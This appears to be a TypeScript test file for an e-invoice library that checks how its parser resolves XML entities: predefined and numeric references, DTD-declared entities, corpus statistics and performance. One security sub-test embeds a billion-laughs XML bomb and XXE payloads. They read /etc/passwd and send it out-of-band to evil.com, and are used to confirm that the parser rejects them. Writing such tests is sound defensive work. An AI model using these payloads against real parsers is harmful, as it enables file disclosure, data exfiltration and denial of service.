486 lines
16 KiB
TypeScript
486 lines
16 KiB
TypeScript
|
import { expect, tap } from '@git.zone/tstest/tapbundle';
|
|||
|
import * as einvoice from '../../../ts/index.js';
|
|||
|
import * as plugins from '../../plugins.js';
|
|||
|
import { CorpusLoader } from '../../helpers/corpus.loader.js';
|
|||
|
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
|
|||
|
|
|||
|
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
|
|||
|
// Tracker shared by the sub-tests in this callback: each one brackets its work
// with startOperation()/endOperation(), and getSummary() is printed at the end.
const performanceTracker = new PerformanceTracker('PARSE-09');
|
|||
|
|
|||
|
// Sub-test: feeds each of the five predefined XML entity references to the
// parser, once in element content and once in an attribute value, and logs
// whether parsing succeeded. Failures are logged, not asserted.
await t.test('Predefined XML entities', async () => {
  performanceTracker.startOperation('predefined-entities');

  // `entity` is the escaped reference as it must appear inside the XML text;
  // `character` is the literal character it stands for. The two must differ:
  // writing the raw character into the document would make it malformed.
  const predefinedEntities = [
    {
      name: 'Ampersand',
      entity: '&amp;',
      character: '&',
      description: 'Used in company names and text'
    },
    {
      name: 'Less than',
      entity: '&lt;',
      character: '<',
      description: 'Used in text content'
    },
    {
      name: 'Greater than',
      entity: '&gt;',
      character: '>',
      description: 'Used in text content'
    },
    {
      name: 'Quote',
      entity: '&quot;',
      character: '"',
      description: 'Used in attribute values'
    },
    {
      name: 'Apostrophe',
      entity: '&apos;',
      character: "'",
      description: 'Used in attribute values'
    }
  ];

  for (const entity of predefinedEntities) {
    const startTime = performance.now();

    const testXml = `<?xml version="1.0"?>
<invoice>
<supplier>Test ${entity.entity} Company</supplier>
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
</invoice>`;

    console.log(`${entity.name} entity (${entity.entity}):`);
    console.log(` Character: "${entity.character}"`);
    console.log(` Usage: ${entity.description}`);

    try {
      const invoice = new einvoice.EInvoice();
      // Feature-detect the parser entry point before calling it.
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(testXml);
        console.log(' ✓ Entity resolved correctly');
      } else {
        console.log(' ⚠️ Cannot test without fromXmlString');
      }
    } catch (error) {
      console.log(` ✗ Error: ${error.message}`);
    }

    // Time is recorded whether or not parsing succeeded.
    performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('predefined-entities');
});
|
|||
|
|
|||
|
// Sub-test: checks that decimal (&#NNN;) and hexadecimal (&#xHHH;) character
// references decode to the expected characters. This is a local check on the
// reference syntax itself; it does not call the invoice parser.
await t.test('Numeric character references', async () => {
  performanceTracker.startOperation('numeric-entities');

  // `ref` is the escaped reference as written in XML; `char` is the character
  // it must decode to.
  const numericTests = [
    {
      name: 'Decimal references',
      tests: [
        { ref: '&#65;', char: 'A', description: 'Latin capital A' },
        { ref: '&#8364;', char: '€', description: 'Euro sign' },
        { ref: '&#169;', char: '©', description: 'Copyright symbol' },
        { ref: '&#8482;', char: '™', description: 'Trademark symbol' },
        { ref: '&#176;', char: '°', description: 'Degree symbol' }
      ]
    },
    {
      name: 'Hexadecimal references',
      tests: [
        { ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
        { ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
        { ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
        { ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
        { ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
      ]
    }
  ];

  // Decodes a single numeric character reference to its character.
  // Throws if `ref` is not of the form &#NNN; or &#xHHH;.
  const decodeNumericReference = (ref: string): string => {
    const match = /^&#(x[0-9A-Fa-f]+|[0-9]+);$/.exec(ref);
    if (!match) {
      throw new Error(`Not a numeric character reference: ${ref}`);
    }
    const digits = match[1];
    const codePoint = digits.startsWith('x')
      ? Number.parseInt(digits.slice(1), 16)
      : Number.parseInt(digits, 10);
    return String.fromCodePoint(codePoint);
  };

  for (const category of numericTests) {
    console.log(`\n${category.name}:`);

    for (const test of category.tests) {
      const startTime = performance.now();

      const xml = `<?xml version="1.0"?>
<invoice>
<amount currency="${test.ref}EUR">100.00</amount>
<temperature>${test.ref}C</temperature>
<copyright>${test.ref} 2024</copyright>
</invoice>`;

      console.log(` ${test.ref} = "${test.char}" (${test.description})`);

      try {
        // Verify entity resolution: decode the reference, substitute it
        // everywhere in the document (literal split/join, no regex escaping
        // needed), and confirm nothing unresolved is left behind.
        const decoded = decodeNumericReference(test.ref);
        const resolved = xml.split(test.ref).join(decoded);
        if (decoded === test.char && !resolved.includes(test.ref)) {
          console.log(' ✓ Entity would resolve correctly');
        } else {
          console.log(` ✗ Resolution error: expected "${test.char}", got "${decoded}"`);
        }
      } catch (error) {
        console.log(` ✗ Resolution error: ${error.message}`);
      }

      performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
    }
  }

  performanceTracker.endOperation('numeric-entities');
});
|
|||
|
|
|||
|
// Sub-test: hands documents that declare their own entities in an internal DTD
// subset to the parser and logs the outcome. Either outcome (parsed or thrown)
// is only logged; nothing is asserted.
await t.test('Custom entity definitions (DTD)', async () => {
  performanceTracker.startOperation('custom-entities');

  // Each case carries the XML plus optional metadata that is only used for
  // logging: `entities` (declared name -> value), `description`, `expected`.
  const customEntityTests = [
    {
      name: 'Internal DTD entities',
      // All four declared entities are referenced in the body, including
      // &currency; inside an attribute value.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY company "Acme Corporation">
<!ENTITY address "123 Main Street, London">
<!ENTITY year "2024">
<!ENTITY currency "EUR">
]>
<invoice>
<supplier>&company;</supplier>
<supplierAddress>&address;</supplierAddress>
<date>01-01-&year;</date>
<amount currency="&currency;">1000.00</amount>
</invoice>`,
      entities: {
        'company': 'Acme Corporation',
        'address': '123 Main Street, London',
        'year': '2024',
        'currency': 'EUR'
      }
    },
    {
      name: 'Parameter entities',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % common SYSTEM "common.dtd">
%common;
<!ENTITY company "Test Company">
]>
<invoice>
<supplier>&company;</supplier>
</invoice>`,
      description: 'External parameter entities (security risk)'
    },
    {
      name: 'Nested entity references',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY city "London">
<!ENTITY country "UK">
<!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
<address>&fullAddress;</address>
</invoice>`,
      expected: 'London, UK'
    }
  ];

  for (const test of customEntityTests) {
    const startTime = performance.now();

    console.log(`\n${test.name}:`);

    if (test.entities) {
      console.log(' Defined entities:');
      for (const [name, value] of Object.entries(test.entities)) {
        console.log(` &${name}; = "${value}"`);
      }
    }

    if (test.description) {
      console.log(` Note: ${test.description}`);
    }

    if (test.expected) {
      console.log(` Expected result: ${test.expected}`);
    }

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        // Note: Many parsers disable DTD processing by default for security
        await invoice.fromXmlString(test.xml);
        console.log(' ✓ Parsed (DTD support may vary)');
      }
    } catch (error) {
      console.log(` ⚠️ DTD parsing: ${error.message}`);
      console.log(' Note: DTD processing often disabled for security');
    }

    performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('custom-entities');
});
|
|||
|
|
|||
|
// Sub-test: feeds well-known malicious DTD payloads to the parser. A thrown
// error is logged as the desired outcome; a successful parse is logged as a
// security warning. Neither outcome fails the test.
await t.test('Entity security considerations', async () => {
  performanceTracker.startOperation('entity-security');

  // `risk` and `mitigation` are descriptive text used only for logging.
  const securityTests = [
    {
      name: 'Billion laughs attack (XML bomb)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<invoice>
<data>&lol4;</data>
</invoice>`,
      risk: 'Exponential entity expansion',
      mitigation: 'Disable DTD processing or limit entity expansion'
    },
    {
      name: 'External entity injection (XXE)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<data>&xxe;</data>
</invoice>`,
      risk: 'File disclosure, SSRF',
      mitigation: 'Disable external entity resolution'
    },
    {
      name: 'Parameter entity XXE',
      // The inner declaration's percent sign is written as &#x25; because a
      // bare "%" that does not start a parameter-entity reference is not
      // permitted inside an entity value.
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;
]>
<invoice></invoice>`,
      risk: 'Out-of-band data exfiltration',
      mitigation: 'Disable parameter entities'
    }
  ];

  for (const test of securityTests) {
    console.log(`\n${test.name}:`);
    console.log(` Risk: ${test.risk}`);
    console.log(` Mitigation: ${test.mitigation}`);

    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(test.xml);
        // Reaching this line means the payload was accepted without an error.
        console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
      }
    } catch (error) {
      console.log(' ✓ Parser correctly rejected dangerous entities');
      console.log(` Error: ${error.message}`);
    }

    performanceTracker.recordMetric('security-test', performance.now() - startTime);
  }

  performanceTracker.endOperation('entity-security');
});
|
|||
|
|
|||
|
// Sub-test: prints a catalogue of entity usage patterns that commonly occur in
// invoice text. Purely informational: nothing is parsed or asserted.
await t.test('Entity usage in e-invoices', async () => {
  performanceTracker.startOperation('einvoice-entities');

  // `text` is the string as it would be written in XML (escaped), `entity` is
  // the reference used in it, and `resolved` is the character it stands for.
  // Characters without a predefined XML entity use numeric references.
  const einvoicePatterns = [
    {
      name: 'Currency symbols',
      examples: [
        { text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
        { text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
        { text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
        { text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' }
      ]
    },
    {
      name: 'Special characters in company names',
      examples: [
        { text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
        { text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
        { text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
        { text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' }
      ]
    },
    {
      name: 'Legal symbols',
      examples: [
        { text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
        { text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
        { text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' }
      ]
    },
    {
      name: 'Mathematical symbols',
      examples: [
        { text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
        { text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
        { text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' }
      ]
    }
  ];

  for (const category of einvoicePatterns) {
    console.log(`\n${category.name}:`);

    for (const example of category.examples) {
      console.log(` "${example.text}"`);
      console.log(` Entity: ${example.entity} → ${example.resolved}`);
    }
  }

  performanceTracker.endOperation('einvoice-entities');
});
|
|||
|
|
|||
|
// Sub-test: scans up to 100 corpus files as plain text and reports how many
// contain predefined entity references, numeric character references, and
// DTD / entity declarations. Statistics are logged; nothing is asserted.
await t.test('Corpus entity analysis', async () => {
  performanceTracker.startOperation('corpus-entities');

  const corpusLoader = new CorpusLoader();
  const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);

  console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);

  // All counters are per file (a file counts once regardless of how many
  // occurrences it contains). `predefinedEntities` maps reference -> files.
  const entityStats = {
    total: 0,
    filesWithEntities: 0,
    predefinedEntities: new Map<string, number>(),
    numericEntities: 0,
    customEntities: 0,
    dtdFiles: 0
  };

  // Escaped forms of the five predefined XML entities, as they appear in files.
  const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
  // No `g` flag, so reusing the pattern across files with .test() is stateless.
  const numericReferencePattern = /&#\d+;|&#x[\dA-Fa-f]+;/;

  const sampleSize = Math.min(100, xmlFiles.length);
  const sampledFiles = xmlFiles.slice(0, sampleSize);
  let unreadableFiles = 0;

  for (const file of sampledFiles) {
    entityStats.total++;

    try {
      const content = await plugins.fs.readFile(file.path, 'utf8');
      let hasEntities = false;

      // Check for predefined entities
      for (const entity of predefined) {
        if (content.includes(entity)) {
          hasEntities = true;
          entityStats.predefinedEntities.set(
            entity,
            (entityStats.predefinedEntities.get(entity) || 0) + 1
          );
        }
      }

      // Check for numeric entities
      if (numericReferencePattern.test(content)) {
        hasEntities = true;
        entityStats.numericEntities++;
      }

      // Check for DTD. A DOCTYPE alone does not imply custom entities, so the
      // custom-entity counter only moves when an <!ENTITY declaration exists.
      const declaresEntity = content.includes('<!ENTITY');
      if (content.includes('<!DOCTYPE') || declaresEntity) {
        entityStats.dtdFiles++;
      }
      if (declaresEntity) {
        entityStats.customEntities++;
      }

      if (hasEntities) {
        entityStats.filesWithEntities++;
      }
    } catch (error) {
      // Best effort: skip files that can't be read, but keep count so the
      // omission is visible in the report instead of silently lost.
      unreadableFiles++;
    }
  }

  // Avoid NaN% when the corpus yields no files.
  const percentWithEntities = entityStats.total > 0
    ? (entityStats.filesWithEntities / entityStats.total * 100).toFixed(1)
    : '0.0';

  console.log('\nEntity Usage Statistics:');
  console.log(`Files analyzed: ${entityStats.total}`);
  console.log(`Files with entities: ${entityStats.filesWithEntities} (${percentWithEntities}%)`);
  if (unreadableFiles > 0) {
    console.log(`Files skipped (unreadable): ${unreadableFiles}`);
  }

  console.log('\nPredefined entities:');
  for (const [entity, count] of entityStats.predefinedEntities.entries()) {
    console.log(` ${entity}: ${count} files`);
  }

  console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
  console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
  console.log(`Custom entities: ${entityStats.customEntities} files`);

  performanceTracker.endOperation('corpus-entities');
});
|
|||
|
|
|||
|
// Sub-test: times the parser on generated documents containing an increasing
// number of entity references and logs the throughput. Parse errors are
// logged per size; nothing is asserted.
await t.test('Entity resolution performance', async () => {
  performanceTracker.startOperation('entity-performance');

  // Generate XML with varying entity density.
  // `entityCount` is the number of <fieldN> elements; each element carries
  // three references (one predefined entity, two decimal character references).
  const generateXmlWithEntities = (entityCount: number): string => {
    let xml = '<?xml version="1.0"?>\n<invoice>\n';

    for (let i = 0; i < entityCount; i++) {
      xml += ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`;
    }

    xml += '</invoice>';
    return xml;
  };

  const testSizes = [10, 100, 500, 1000];

  console.log('\nEntity resolution performance:');

  for (const size of testSizes) {
    const xml = generateXmlWithEntities(size);
    const xmlSize = Buffer.byteLength(xml, 'utf8');
    const entityCount = size * 3; // 3 entities per field

    // Document generation is deliberately excluded from the timed region.
    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(xml);
      }

      const parseTime = performance.now() - startTime;

      console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
      console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
      console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);

      // The metric is only recorded when parsing did not throw.
      performanceTracker.recordMetric(`entities-${size}`, parseTime);
    } catch (error) {
      console.log(` Error with ${size} entities: ${error.message}`);
    }
  }

  performanceTracker.endOperation('entity-performance');
});
|
|||
|
|
|||
|
// Performance summary collected by the tracker across all sub-tests above.
console.log('\n' + performanceTracker.getSummary());

// Entity handling best practices (informational output only).
// The predefined entities are printed in their escaped form so the message
// names the references rather than the characters they resolve to.
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
|
|||
|
});
|
|||
|
|
|||
|
tap.start();
|